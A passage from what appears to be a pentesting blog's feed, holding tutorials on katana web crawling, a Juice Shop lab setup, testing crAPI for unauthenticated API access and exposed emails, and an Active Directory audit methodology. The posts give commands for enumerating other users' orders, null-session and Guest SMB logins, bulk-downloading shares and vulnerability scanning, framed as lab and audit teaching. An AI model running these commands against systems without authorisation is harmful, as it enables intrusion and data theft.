This initial crawl is just the beginning. It will be complemented by a more detailed examination conducted through our proxy, allowing us to compile a comprehensive list of targets within the application&apos;s scope. Together, these methods ensure that no stone is left unturned in our quest to secure the web application.

There are numerous tools available for carrying out this process, each with its own set of features and capabilities. While you can explore a variety of these tools through [recommended links](https://github.com/vavkamil/awesome-bugbounty-tools?tab=readme-ov-file#Content-Discovery), I personally prefer using [&quot;katana&quot;](https://github.com/projectdiscovery/katana) from Project Discovery. Katana stands out due to its efficiency and the depth of analysis it offers, making it an invaluable asset in our security toolkit. In this article, we&apos;ll dive deeper into how Katana facilitates our web crawling objectives, highlighting its features and demonstrating its application in real-world scenarios.

## Leveraging Katana

With the groundwork laid and the importance of a detailed web crawl established, engaging Katana becomes our strategic move to unearth even more about our target&apos;s digital terrain. Let&apos;s initiate this journey with a simple command:

```bash
echo &lt;url&gt; | katana

```

![](/content/images/2024/02/image-23.png)

Normal katana execution

Utilizing Katana with its default settings offers a glimpse into the application&apos;s link structure, yet our ambition drives us to seek a comprehensive view. To encapsulate the breadth of potential vulnerabilities, we enhance our toolkit with specific flags that amplify our discovery process.

### **Enhancing Discovery with Headless Mode**

In the context of modern web applications, particularly Single Page Applications (SPA) that dynamically load content, the `-headless` flag becomes an indispensable tool in our arsenal. By activating this flag, we leverage the robust capabilities of the Chromium engine. This strategic move is crucial for applications like the one we&apos;re testing, where content is dynamically generated and traditional crawling methods fall short.

```bash
echo &lt;url&gt; | katana -headless

```

![](/content/images/2024/02/image-24.png)

Using the `-headless` parameter

Utilizing Katana in headless mode allows us to simulate a real user&apos;s interaction with the application, bypassing the limitations that prevent standard crawlers from accessing dynamically loaded content. This command adjustment is transformative, unveiling a wealth of links that would otherwise remain concealed.

### **Maximizing Results with JavaScript Crawling**

Our quest for exhaustiveness leads us to the `-js-crawl` flag, enabling Katana to scrutinize JavaScript files for hidden links:

```bash
echo &lt;url&gt; | katana -headless -js-crawl

```

![](/content/images/2024/02/image-25.png)

Maximizing findings by searching inside JavaScript files

This configuration is my standard for ensuring no potential link is overlooked, setting the stage for a detailed vulnerability assessment. After collecting a comprehensive set of data, I utilize `grep` to sift through the findings, focusing specifically on the links that align with our security assessment goals. This process of manual refinement is essential for isolating relevant vulnerabilities from the broader dataset, ensuring our efforts are as targeted and effective as possible. While Katana&apos;s capabilities extend beyond these commands, including options for targeted filtering and output customization, I encourage a dive into its official documentation to discover how best to tailor its use to your needs.

### **Diving Deeper: Advanced Options**

In addition to the foundational strategies we&apos;ve explored, there are several intriguing options worth considering to further refine our web crawling efforts. Among these, two advanced flags stand out for their potential to significantly deepen our exploration:

-   The `-d` flag offers the capability to adjust the crawl&apos;s depth, striking a perfect balance between thorough exploration and efficient time management. This adaptability is invaluable, allowing us to customize the depth of our crawl to meet the unique requirements of each security assessment and ensure a comprehensive exploration of the web application.
-   The `-aff` flag, an experimental feature, enables automatic form filling to simulate user interactions, opening the door to discovering links that might remain hidden under normal circumstances. This approach can unveil vulnerabilities accessible only through specific user behaviors, providing a richer, more detailed perspective on the application&apos;s security landscape.

## **Authenticated Crawling**

In the comprehensive process of web application security auditing, an essential technique involves enhancing our crawling capabilities by integrating authentication cookies. This step is crucial as it unveils links and resources accessible only after authentication, offering deeper insights into the application’s security landscape. The journey begins with registering on the application, which, in the case of JuiceShop, involves obtaining a JWT (JSON Web Token). This token is vital for authenticating against the application&apos;s API, and [I have delved into its specifics in a dedicated chapter of the Hacking APIs series](https://www.kayssel.com/post/api-hacking-3/).

![](/content/images/2024/02/image-26.png)

User registration

Retrieving this JWT can be achieved in a couple of ways. You could use the browser&apos;s developer tools, accessed with the F12 key, to inspect the cookies directly. Alternatively, proxy tools such as mitmproxy, Burp Suite, or OWASP ZAP can be employed to capture the necessary requests and thus obtain the tokens and cookies used in authenticated sessions.

![](/content/images/2024/02/image-27.png)

Cookies in Firefox

![](/content/images/2024/02/image-30.png)

Cookies in mitmproxy

Once the JWT is in hand, the next course of action is to export this token, along with any relevant cookies, into a file. This file then serves as a bridge to the next step of our process. By feeding this information into Katana’s crawling mechanism with the `-H` argument, we ensure the inclusion of the authentication header in our crawl. To guarantee that the integration works as intended, I recommend using the `-proxy` argument for debugging purposes. This allows for real-time monitoring of the requests, affirming that the authentication details are correctly applied to the tool&apos;s operations.

![](/content/images/2024/02/image-32.png)

Cookies on file

The effectiveness of this method is evidenced by the seamless integration of authentication cookies into Katana, as illustrated in the image below.

![](/content/images/2024/02/image-34.png)

Requests with authentication using Katana

Though the procedure may appear direct and uncomplicated, the critical practice of debugging requests to ensure that session cookies are effectively passed to Katana&apos;s requests cannot be overstated. This step is essential in web application security auditing, as it verifies the authenticity and effectiveness of our crawling efforts.

![](/content/images/2024/02/image-33.png)

Verification that the requests are made successfully

## The Power Of Parameters

In our discussions on optimizing the use of katana for web application security assessments, I&apos;ve emphasized my general approach of not applying filters directly within katana. However, there exists a particularly useful parameter that, under certain circumstances, merits consideration. This parameter shines when automating the detection of vulnerabilities, and it&apos;s one we&apos;ll be leveraging in our future explorations.

The parameter in question is `-f qurl`. Its primary function is to home in on URLs that carry GET parameters, specifically those that use the &quot;?&quot; character to delineate them. This focus is invaluable because it narrows our examination to the points within an application where user input is processed directly in the URL, often a hotspot for potential vulnerabilities.

To apply this parameter alongside others for a comprehensive and targeted analysis, the command structure would look something like this:

```bash
katana -u &quot;&lt;url&gt;&quot; -f qurl -jc -headless

```

![](/content/images/2024/02/image-35.png)

Links found with parameters

# Conclusion

As we close this chapter, we reflect on the comprehensive journey through the landscape of web application security. The sophisticated art of web crawling, enriched by strategic methodologies and the adept use of Katana, has prepared us to face the complexities of modern web applications. This exploration goes beyond mere detection, enabling us to understand and mitigate the myriad vulnerabilities that challenge the security of the digital world. It&apos;s a testament to the evolving nature of security auditing, urging us to constantly seek out new tools and techniques to safeguard our digital frontiers.

# Additional Resources

[GitHub - projectdiscovery/katana: A next-generation crawling and spidering framework.](https://github.com/projectdiscovery/katana)

[GitHub - vavkamil/awesome-bugbounty-tools: A curated list of various bug bounty tools](https://github.com/vavkamil/awesome-bugbounty-tools?tab=readme-ov-file#Content-Discovery)</content:encoded><author>Ruben Santos</author></item><item><title>Web Application Hacking Fundamentals: Starting the Journey</title><link>https://www.kayssel.com/post/hacking-web-1</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-1</guid><description>We delve into web app hacking basics, covering essential tools, OWASP Juice Shop lab setup, and key skills in Linux, Python, and security. The first step towards mastering web security.</description><pubDate>Wed, 21 Feb 2024 07:51:12 GMT</pubDate><content:encoded># Introduction to the series

Welcome to the new series I&apos;m embarking on, focused on hacking web applications. These applications are a common sight in penetration testing, especially for those just starting their journey in the field. From my experience, I&apos;ve noticed a common challenge among newcomers: the overwhelming feeling of navigating through the methodology required for a web audit. There&apos;s often confusion about whether they&apos;re covering too much ground or if they&apos;ve thoroughly completed their task, leading to a tangled process. This series aims to demystify the process for beginners, providing a clear path forward.

Moreover, we&apos;re diving into how to audit web applications without the need for Burp Pro or any paid tools. We&apos;ll leverage open-source tools, making this series a haven for those who prefer working directly from the terminal. That&apos;s right, all you&apos;ll need is a terminal and a browser to follow along.

However, it&apos;s important to note that this series won&apos;t cover every vulnerability out there. Instead, our focus will be on how to identify vulnerabilities and automate their detection. For those eager to delve deeper into specific techniques or vulnerabilities, I highly recommend Burp&apos;s academy as a resource. It offers comprehensive coverage and dedicated labs for a wide range of vulnerabilities. Here is the link to Burp&apos;s academy for further exploration:

[Web Security Academy: Free Online Training from PortSwigger](https://portswigger.net/web-security)

This approach is designed to make web application auditing accessible and engaging, whether you&apos;re just starting out or looking to refine your skills with open-source tools. Let&apos;s embark on this journey together, armed with nothing but our terminals and a thirst for knowledge.

# Level you will need

For this enlightening journey through web application hacking, there are three essential skills you&apos;ll need to embark effectively:

1.  **Proficiency with the Terminal and Linux Tools**: The backbone of this series is the terminal. Every test and task we undertake will be executed within this environment, utilizing an array of Linux commands. A solid grasp of these commands and the ability to navigate the terminal environment with ease are imperative. For those who might feel less confident or are newcomers to the Linux world, don&apos;t worry. In the resources section, I&apos;ll provide a link to a complimentary course designed to get you up to speed.
2.  **Basic Understanding of Web Vulnerabilities**: While the series aims to guide you through identifying and exploiting vulnerabilities, a foundational knowledge of what these vulnerabilities are is crucial. We won&apos;t delve into the minutiae of each vulnerability; instead, our focus will be on detection and exploitation techniques. Therefore, having some prior knowledge or experience in this area will be incredibly beneficial as we progress.
3.  **Basic Programming Skills, Especially in Python**: Automation and scripting will be key components of our hacking endeavors. Python, with its vast ecosystem and readability, will be our primary tool for extending the capabilities of other tools we&apos;ll be using. Additionally, familiarity with Bash or similar scripting languages is necessary, as they will also play a significant role in our processes. A basic level of programming proficiency will enable you to follow along and engage fully with the series.

These prerequisites are designed to ensure that you can follow the series effectively and make the most out of the techniques and strategies we&apos;ll explore. Remember, the resources section is there to support your learning journey, providing links and materials to bolster your skills where needed. Let&apos;s gear up for an engaging and educational adventure into the world of web application hacking, leveraging the power of open-source tools and the command line.

# Basic Tools diagrams

![](/content/images/2024/02/image-21.png)

Kicking off my series on hacking web applications, let’s dive into the essential toolkit for conducting a comprehensive web penetration test. Instead of categorizing tools, I&apos;ll focus on the specific activities and the types of tools needed for each. These activities are central to the pentesting process, and the tools I&apos;ve selected are pivotal for executing these main activities in web application penetration testing:

1.  **Information Gathering and Web Scraping**: The first step in any web application penetration test is gathering as much information as possible about the target. Tools that automate the collection of URLs, endpoints, and other relevant data from the web application are crucial here. Instead of focusing on a single tool, I look for tools that can efficiently crawl a web application and compile a comprehensive list of resources.
2.  **Fuzzing and Asset Discovery**: Once I have a map of the application, the next step is to discover hidden or non-obvious assets, including directories, files, and functionalities not directly linked within the application. Fuzzing tools come into play here, helping me guess and identify these assets. My preference leans towards tools that can automate this process, offering customization options to fine-tune my fuzzing techniques.
3.  **Interception and Request Manipulation with Proxies**: A significant part of penetration testing involves intercepting and manipulating web requests. Proxies are indispensable for this purpose, allowing me to view, modify, and replay requests. I rely on proxies that offer advanced features like SSL interception, request modification, and automated testing capabilities.
4.  **Vulnerability Scanning and Exploitation**: Finally, identifying vulnerabilities and potential points of exploitation is the culmination of the testing process. Vulnerability scanners that can automate the detection of common vulnerabilities and provide actionable insights are a key part of my toolkit. However, I also value tools that allow for manual testing and exploration, as automation cannot catch every possible security issue.

Throughout this series, I&apos;ll delve into how I use these tools in a real-world context, integrating them into my methodology to conduct thorough and effective web application penetration tests.

# Laboratory

Setting up a practical lab environment is crucial for me to apply and refine the hacking techniques I discuss in this series. A lab provides a safe, legal, and controlled environment for me to practice my skills. That&apos;s why I chose the OWASP Juice Shop project as my lab environment. OWASP Juice Shop is a deliberately insecure web application designed for training, educational purposes, and to test web application security tools and techniques.

### Why OWASP Juice Shop?

OWASP Juice Shop encompasses a wide range of web vulnerabilities, making it an ideal choice for a hands-on learning environment. It covers the OWASP Top 10 vulnerabilities and beyond, offering me a comprehensive platform to practice attacks and testing strategies in real-time without any legal implications.

### Setting Up Your Lab with Docker

Docker simplifies the process of deploying applications and their environments. To use OWASP Juice Shop as your lab, you first need to have Docker installed on your machine. Docker allows you to run applications in isolated environments called containers. Here&apos;s a brief guide on setting up OWASP Juice Shop using Docker:

-   **Install Docker**: If Docker isn&apos;t already installed on your machine, you&apos;ll need to install it. The process varies depending on your operating system, but for Ubuntu server machines, detailed instructions are provided in the [link shared in the series](https://www.kayssel.com/post/lab-3/#setting-up-an-ubuntu-server-in-proxmox-for-internal-network-simulation).
-   **Pull OWASP Juice Shop Docker Image**: Once Docker is installed, you can pull the OWASP Juice Shop image from Docker Hub. Open your terminal and execute the following command:

```bash
docker pull bkimminich/juice-shop

```

This command downloads the latest Juice Shop image to your local machine.

-   **Run OWASP Juice Shop**: After pulling the image, run the following command to start the Juice Shop application:

```bash
docker run --rm -p 3000:3000 bkimminich/juice-shop

```

This command starts a Docker container with the Juice Shop application and maps its service port (3000) to the same port on your host machine. The `--rm` flag automatically removes the container when it&apos;s stopped, ensuring that your setup remains clean.

### Accessing OWASP Juice Shop

With the application running, you can access OWASP Juice Shop by navigating to `http://localhost:3000` in your web browser. You&apos;re now ready to begin practicing various web application hacking techniques in a realistic, yet secure and ethical environment.

![](/content/images/2024/02/image-22.png)

# Conclusions

As we conclude the inaugural chapter of this series on hacking web applications, it&apos;s clear that we&apos;re embarking on a journey that not only aims to demystify the complexities of web application penetration testing but also to arm you with the knowledge and tools needed to navigate this challenging yet rewarding field.

Throughout this first installment, we&apos;ve laid the groundwork for what promises to be an in-depth exploration into the art and science of web application security. We&apos;ve discussed the importance of understanding the methodology behind a web audit, the necessity of proficiency with terminal and Linux tools, and the foundational knowledge of web vulnerabilities and basic programming skills, particularly in Python.

The introduction of open-source tools and the setup of a practical lab environment using the OWASP Juice Shop project highlights our commitment to providing accessible and hands-on learning experiences. These tools and resources are not just meant to serve as a guide but as a companion in your journey towards becoming proficient in web application hacking.

By focusing on the essential activities of information gathering, fuzzing, interception, and vulnerability scanning, we&apos;ve begun to peel back the layers of web application security. Each tool and technique introduced here is a stepping stone towards a deeper understanding and mastery of the field.

As we move forward, remember that this series is designed to evolve with you, whether you&apos;re just starting out or looking to refine your existing skills. The journey into web application hacking is both broad and deep, and what we&apos;ve covered in this first chapter is just the tip of the iceberg.

Looking ahead, we&apos;ll dive deeper into each category of tools, exploring more advanced techniques, and tackling real-world challenges. The OWASP Juice Shop will serve as our sandbox, where theory meets practice, and where you&apos;ll have the opportunity to apply what you&apos;ve learned in a controlled environment.

I invite you to stay tuned for the next chapters, where we&apos;ll continue to build upon the foundation laid here, exploring new vulnerabilities, sharpening our skills, and furthering our understanding of how to protect web applications from emerging threats.

This series is more than just a collection of articles; it&apos;s a pathway to mastery in web application security. Thank you for joining me on this journey. Together, let&apos;s continue to push the boundaries of what&apos;s possible in the realm of web application hacking.

# Resources

[Challenge solutions · Pwning OWASP Juice Shop](https://help.owasp-juice.shop/appendix/solutions.html)</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling Shadows: Navigating the Risks of Unauthenticated API Access and Excessive Information Exposure</title><link>https://www.kayssel.com/post/unauth-excessive</link><guid isPermaLink="true">https://www.kayssel.com/post/unauth-excessive</guid><description>This article explores Unauthenticated API Access and Excessive Information Exposure, highlighting tools like Burp Suite, Autorize, and Aquatone for identifying and mitigating these vulnerabilities in API security.</description><pubDate>Fri, 16 Feb 2024 12:30:12 GMT</pubDate><content:encoded># Introduction

Welcome to the latest chapter in our dedicated API hacking series. Today, we embark on a detailed exploration of two pivotal vulnerabilities that present significant risks to API security: Unauthenticated API Access and Excessive Information Exposure. This chapter is designed to not only enhance your understanding of these vulnerabilities, but also to provide you with practical strategies for their identification and mitigation. Leveraging the power of tools like Burp Suite and Aquatone, we&apos;ll dive into real-world scenarios that bring these abstract concepts to life. As we dissect these vulnerabilities, our goal is to arm you with the knowledge and expertise necessary to fortify your applications against potential breaches. Prepare to deepen your insights into the critical aspects of API security, ensuring you&apos;re well-equipped to navigate the challenges of the digital age.

# **Unauthenticated API Access**: Unveiling Hidden Entrances

Unauthenticated API access as a vulnerability refers to a security flaw in which APIs can be accessed without any form of authentication. This means that sensitive endpoints within an application&apos;s API are exposed to potential unauthorized use, allowing attackers to access or manipulate private data, execute unauthorized functions, or potentially gain further access to the system without needing to verify their identity.

This vulnerability arises from insufficient security measures during API development and deployment, where endpoints are not properly secured with authentication mechanisms. As we&apos;ve seen in one of the chapters of our series, the application in question manages authentication using JSON Web Tokens (JWT). Despite JWT&apos;s potential for securing access, without rigorous implementation and checks, APIs remain vulnerable to unauthorized access, posing significant security risks.

The consequences of exploiting unauthenticated API access can be severe, ranging from data breaches and loss of sensitive information to system compromise and operational disruption. Attackers can use unauthenticated access to bypass security controls, elevate their privileges within a system, or launch further attacks against other parts of the network.

## **Practical Exploration: Unmasking Unauthenticated Access**

To identify vulnerabilities of this kind, it&apos;s best to have thoroughly examined the entire application and gathered a substantial number of requests in Burp&apos;s history. Detecting such vulnerabilities entails testing each request without the JWT to determine if the same information can be accessed.
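At its core, the check is mechanical: replay each captured request without the token and compare the two answers. A minimal Python sketch of that comparison logic (a hypothetical helper for illustration, not part of Burp or any specific tool):

```python
# Sketch: flag an endpoint as unauthenticated-accessible when the request
# replayed WITHOUT its JWT receives essentially the same answer.
def looks_unauthenticated(auth_status, auth_body, anon_status, anon_body):
    """True when the anonymous request got the same successful response."""
    if anon_status != 200:
        return False  # a 401/403 without the token is the expected behaviour
    return auth_status == anon_status and auth_body == anon_body

# Expected, safe behaviour: the server rejects the tokenless request.
print(looks_unauthenticated(200, '{"orders": [1]}', 401, 'Unauthorized'))
# The flaw: identical 200 responses with and without the token.
print(looks_unauthenticated(200, '{"orders": [1]}', 200, '{"orders": [1]}'))
```

Tools like Autorize automate exactly this replay-and-compare loop across your whole Burp history.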

While scrutinizing requests in a small-scale application like crAPI may be manageable, the task becomes considerably more cumbersome in larger, real-world applications where the volume of requests is typically much higher. Thankfully, there are solutions available to automate parts of this process. One commonly used tool in conjunction with Burp is Autorize, known for its ease of use and efficiency in navigating through extensive request logs. If you&apos;re interested, you can explore its repository for further details.

[GitHub - PortSwigger/autorize: Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests](https://github.com/PortSwigger/autorize)

On a different note, I&apos;ve decided to take a different approach by leveraging a combination of other tools to enhance visualization. Allow me to introduce you to Aquatone. This tool is primarily tailored for external pentesting, generating concise reports with screenshots of discovered web pages for effortless visualization. However, it also proves to be quite effective for authorization testing, offering a convenient overview of vulnerable requests or endpoints.

You&apos;ll quickly grasp its utility. Here&apos;s the GitHub link for you to download and explore further.

[GitHub - michenriksen/aquatone: A Tool for Domain Flyovers](https://github.com/michenriksen/aquatone)

To proceed, you&apos;ll need to copy all the URLs you&apos;ve collected in Burp Suite:

![](/content/images/2024/02/image-18.png)

Copy URLs

Once you&apos;ve completed that step, we&apos;ll initiate Aquatone as follows:

```bash
cat ../endpoints.txt | aquatone

```

![](/content/images/2024/02/image-10.png)

Running Aquatone

The execution should yield the following results, with our primary interest lying in &quot;aquatone\_report.html&quot;.

![](/content/images/2024/02/image-11.png)

Aquatone results

Accessing the report with Chromium, we&apos;ll be presented with all the results, allowing us to swiftly identify the endpoints of interest, thanks to Aquatone&apos;s categorization. In the image below, the highlighted endpoint stands out as particularly significant, revealing the outcome of a successful API request made without the inclusion of a JWT, thereby indicating a vulnerability:

![](/content/images/2024/02/image-12.png)

Vulnerable request found

![](/content/images/2024/02/image-13.png)

Information obtained without authentication

The vulnerable request pertains to viewing past purchases within the application. This can be verified by utilizing Burp Suite and accessing the functionality to view past purchases, as demonstrated in the following two images:

![](/content/images/2024/02/image-17.png)

Past orders

![](/content/images/2024/02/image-8.png)

Vulnerable request captured with Burp

Knowing that this request is accessible without a JWT, we can try to view other users&apos; past purchases. To do so, we build a file of URLs that vary the final ID, presuming each ID corresponds to a different user&apos;s order. In the following image, you can see how I generated IDs from 1 to 10 using the Fish shell.

```bash
for i in (seq 1 10)
    echo &quot;http://192.168.20.120:8888/workshop/api/shop/orders/$i&quot; &gt;&gt; urls.txt
end

```
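If you are not using Fish, the same file can be produced with a few lines of Python (same lab IP and endpoint as above):

```python
# Build the same list of candidate order URLs (IDs 1 to 10) as the Fish loop.
base = "http://192.168.20.120:8888/workshop/api/shop/orders/{}"
with open("urls.txt", "w") as f:
    for i in range(1, 11):
        f.write(base.format(i) + "\n")
```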

![](/content/images/2024/02/image-14.png)

File created with different possibilities

As depicted in the following image, in the second row, we observe the diverse responses from the API, enabling us to inspect past orders of other users, thereby demonstrating the vulnerability:

![](/content/images/2024/02/image-15.png)

Output with different endpoints

![](/content/images/2024/02/image-19.png)

Access to other user&apos;s information

# **Excessive Information Exposure**: Beyond the Surface of API Responses

Following our exploration of &quot;Unauthenticated Access,&quot; a vulnerability that allows attackers to gain access to system functions or data without proper authentication, we delve into another critical but often overlooked risk: &quot;Excessive Information Exposure.&quot;

&quot;Excessive Information Exposure&quot; occurs when an application inadvertently discloses more information than necessary, typically through its API responses. This can range from personal data to system details that could pave the way for further exploitation. Unlike Unauthenticated Access, which directly permits unauthorized entry into systems, Excessive Information Exposure is a subtler vulnerability resulting from a design oversight. This oversight leads to the unnecessary sharing of data, such as detailed error messages, API keys, and user information, that should be restricted or obfuscated.

The bridge between Unauthenticated Access and Excessive Information Exposure is of particular concern. While the former opens the door to unauthorized system interactions, the latter can provide the critical information needed to exploit those interactions more effectively. Together, they create a compounded security risk where the attacker, equipped with excess information, can navigate and manipulate the system with greater precision, potentially leading to identity theft, unauthorized access, and system compromise.

Mitigating these vulnerabilities requires a multifaceted approach. Starting with the principle of least privilege, especially in data sharing and system access, it&apos;s essential to implement rigorous data filtering, proper access controls, and continuous monitoring and auditing of both access patterns and data exposure.
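On the data-filtering side, the fix is conceptually simple: serialize an explicit allow-list of fields rather than the whole database record. A minimal sketch of that idea (the field names here are hypothetical, not taken from crAPI):

```python
# Return only the fields the front end actually needs;
# everything else stays server-side.
PUBLIC_FIELDS = {"id", "nickname", "comment", "created_at"}

def to_public(record):
    return {k: v for k, v in record.items() if k in PUBLIC_FIELDS}

row = {"id": 7, "nickname": "hux", "comment": "Nice post!",
       "created_at": "2024-02-16", "email": "hux@example.com"}
print(to_public(row))  # the email address never reaches the client
```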

## **Case Study: The Perils of Excessive Information Exposure**

We&apos;ve made considerable progress auditing nearly every part of our application. Yet, there&apos;s one segment we haven&apos;t thoroughly examined—the application&apos;s forum. Upon closer inspection, it becomes apparent that the forum hosts comments from three default users.

![](/content/images/2024/02/image-1.png)

Comment sections

Delving into these comments offers an opportunity to test various inputs by replying to existing comments or creating new ones. Despite experimenting with numerous payloads aimed at triggering Cross-Site Scripting (XSS)—a vulnerability we&apos;ll explore in an upcoming series on web hacking—none have proven successful.

![](/content/images/2024/02/image-6.png)

XSS payload

![](/content/images/2024/02/image-7.png)

XSS not interpreted

This lack of success indicates that the application effectively sanitizes user input, thwarting attempts at exploiting this potential vulnerability. However, a deeper investigation into the network requests made while interacting with the forum reveals a significant oversight: the exposure of other users&apos; email addresses. Such information, which unnecessarily reveals more data than required for front-end operations, signals an Excessive Information Exposure vulnerability.

At first glance, this might not seem like a critical issue. Yet, when combined with previously identified vulnerabilities, such as flawed user authentication, this oversight could enable attackers to change the passwords of other users arbitrarily, bypassing the need to ascertain their email addresses.

![](/content/images/2024/02/image-2.png)

E-mail address of persons making comment

![](/content/images/2024/02/image-4.png)

Specific comment

# Conclusions

Our in-depth exploration of Unauthenticated API Access and Excessive Information Exposure vulnerabilities throughout this series has unveiled the intricate challenges and potential threats these weaknesses pose to data security and system functionality. The practical scenarios dissected, alongside the deployment of tools like Burp Suite and Aquatone, have shed light on the paramount importance of enforcing stringent security measures and adhering to the principle of least privilege within application ecosystems. These episodes have emphatically highlighted the critical need for robust authentication protocols, effective data filtering processes, and comprehensive access control measures to counteract the risks presented by these vulnerabilities.

Moreover, the adoption of continuous monitoring and auditing strategies stands out as a vital practice for the timely identification and rectification of security vulnerabilities. The interrelated nature of Unauthenticated API Access and Excessive Information Exposure underscores the necessity for a holistic cybersecurity approach. Addressing one area of vulnerability not only strengthens specific defenses but also bolsters the overall security posture against a spectrum of potential threats.

As we draw this chapter to a close, the enduring message is clear: the fight against cyber threats is a perpetual endeavor that requires unwavering diligence, innovative solutions, and a steadfast commitment to safeguarding our digital domains. This journey through the realms of Unauthenticated Access and Excessive Information Exposure serves as a poignant reminder of the ongoing need for comprehensive security strategies. These strategies are crucial in protecting sensitive data and preserving system integrity in an era where digital connectivity is ubiquitous. Let this series be a beacon, guiding us toward more secure and resilient digital infrastructures in our collective quest to navigate the complexities of the digital age.</content:encoded><author>Ruben Santos</author></item><item><title>Active Directory Pentesting Methodology: Crafting Strategies for Success</title><link>https://www.kayssel.com/post/how-to-win-and-fight-against-active-directory</link><guid isPermaLink="true">https://www.kayssel.com/post/how-to-win-and-fight-against-active-directory</guid><description>In this series, we delved into Active Directory fundamentals, covering essential concepts, advanced reconnaissance, privilege escalation, lateral movement, and domain dominance. We explored techniques like Pass the Hash, Pass the Ticket, and Golden Ticket for comprehensive network penetration.</description><pubDate>Sun, 11 Feb 2024 14:52:18 GMT</pubDate><content:encoded># Introduction

Welcome to the culmination of our journey into the realm of Active Directory auditing. Throughout this series, we&apos;ve embarked on a comprehensive exploration, unraveling the intricacies of this fundamental component of modern network security. Designed with aspiring pentesters in mind, this series aims to demystify the complexities of Active Directory, providing a solid foundation upon which to build your expertise.

As we delve into this final chapter, we&apos;ll consolidate the knowledge accumulated thus far, distilling the essence of each phase into a streamlined methodology. Whether you&apos;re a novice seeking to grasp the basics or a seasoned professional looking to refine your techniques, this article offers a high-level overview of the key concepts and fundamental strategies essential for conducting an effective Active Directory audit.

So, whether you&apos;re embarking on your first foray into network security or seeking to enhance your skills in this ever-evolving field, join me as we navigate the intricate landscape of Active Directory auditing. Together, let&apos;s unlock the secrets of network penetration and control, empowering ourselves to safeguard against the myriad threats lurking within the digital domain.

# Navigating this Article: A Guide to Effective Use

During this article, I&apos;ll provide a high-level overview of the various phases typically involved in an Active Directory audit. The aim is to give you a simplified yet comprehensive outline of all the concepts and basic techniques covered throughout the series. Throughout the article, I&apos;ll highlight specific sections that link to the corresponding chapters where the techniques were discussed in detail. Additionally, there may be instances where I include entire chapters to ensure clarity, as condensing the content excessively could compromise its effectiveness. That being said, I trust you&apos;ll find this overview helpful in grasping the fundamentals of Active Directory auditing. Let&apos;s dive in!

# Exploring Fundamental Concepts: Building a Solid Foundation

The fundamental theory required to comprehend the components of Active Directory is presented in the initial chapter. While Active Directory encompasses a wide array of concepts, this chapter will provide you with the essential understanding of its inner workings.

[Initiating the Active Directory Odyssey: Unveiling Key Concepts and Building the Foundations](https://www.kayssel.com/post/active-directory-1/)

On the other hand, for a deeper dive into users, groups, and Active Directory machines, I&apos;ve crafted the following chapter to provide an introductory overview of these components and how to enumerate them:

[User-Centric Pentesting: Unveiling Secrets with PowerView and PowerSploit](https://www.kayssel.com/post/active-directory-5/)

If you have the opportunity and resources, I strongly recommend setting up your own lab environment. You can achieve this by repurposing an older computer using Proxmox or creating a virtualized environment with VMware or VirtualBox. I have designed a dedicated lab creation series that addresses this specific need. Feel free to explore it if you wish to dive deeper into this hands-on experience.

[Building the Offensive Security Playground: A Step-by-Step Guide](https://www.kayssel.com/series/offensive-lab/)

# Identifying Domain Controllers: The First Step

Typically, audits of this nature are conducted with the assumption that an attacker has already gained access to the company&apos;s internal network. As a result, one of the initial and crucial steps is to identify the location of the domain controllers. This is a pivotal task, as domain controllers often contain valuable information and serve as potential targets for future attacks.

To enumerate these domain controllers, you can employ various tools and methods. [For instance, using &apos;nmap&apos; to scan for the LDAP port or &apos;nslookup&apos; to query the SRV record for LDAP can be effective](https://www.kayssel.com/post/active-directory-2-computers/#domain-controllers):

```bash
sudo nmap -sS --open -p389 192.168.253.0/24
nslookup -q=srv _ldap._tcp.dc._msdcs.shadow.local

```

Once you&apos;ve initiated the process, it becomes vital to gather additional information from the machines within the domain. [In this context, leveraging NTLM via SMB proves to be an ideal approach](https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics/#reconnaissance-tasks-gathering-intelligence):

```bash
ntlm-info smb 192.168.253.130

```

Continuing with SMB, another avenue worth exploring is identifying machines that allow connections with null sessions. This can be accomplished using either CrackMapExec or Enum4linux:

&lt;details&gt;
&lt;summary&gt;Using CrackMapExec:&lt;/summary&gt;

```bash
crackmapexec smb &lt;ip_range&gt; -u &quot;&quot; -p &quot;&quot;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Using Enum4linux:&lt;/summary&gt;

```bash
enum4linux -u &quot;&quot; -p &quot;&quot; -a &lt;ip&gt;

```
&lt;/details&gt;


When using enum4linux, it&apos;s important to recognize that it can provide a wealth of information, particularly if you gain access with null credentials:

1.  **User and Group Data:** Enum4linux can uncover user and group details, such as usernames, descriptions, and memberships, offering valuable insights for reconnaissance.
2.  **Share and Permissions:** It systematically lists shared folders along with their associated permissions, highlighting potential vulnerabilities arising from open shares with weak security measures.
3.  **Password Policy and Hashes:** Enum4linux has the capability to expose password policies, facilitating password-based attacks. In certain scenarios, it can also extract password hashes, which can be used for offline cracking.

Furthermore, it&apos;s worth attempting to gain access to machines through the Guest user account. The commands remain the same as before, with the only difference being setting the username (`-u`) to &quot;Guest&quot;.

In many cases, this approach will grant you access to a machine, enabling you to inspect its shared folders. With luck, you may come across domain credentials, significantly improving your chances of success. It&apos;s worth noting that, in some instances, domain administrator accounts have been discovered within these folders. To establish a connection, you can utilize the following command:

```bash
impacket-smbclient -no-pass &lt;IP_Target&gt;

```

To download files locally, you can use the following commands (everything after the first line is entered at the interactive smbclient prompt):

```bash
smbclient //&lt;ip&gt;/&lt;share&gt;
mask &quot;&quot;
recurse
prompt
mget *

```

In addition to these services, exploring internal network websites can yield valuable access to machines and credentials with high privileges. Often overlooked and outdated, these pages offer ripe opportunities for investigation. To streamline this process, two key tools are recommended, assuming you have access to an internal subnet.

Firstly, [Aquatone](https://github.com/michenriksen/aquatone) provides a comprehensive list of pages alongside corresponding screenshots, offering a quick overview of all available pages:

```bash
cat ips.txt | aquatone -ports xlarge

```

This generates a file named &quot;aquatone\_urls.txt&quot; containing all discovered URLs. Subsequently, passing this file to a vulnerability scanner like [Nuclei](https://github.com/projectdiscovery/nuclei) completes the investigation:

```bash
cat aquatone_urls.txt | nuclei

```

Nuclei often unveils access points for pages with flawed credentials or CVEs, potentially granting even remote code execution. While a detailed discussion of these tools is reserved for future articles, they remain essential components of any comprehensive assessment.

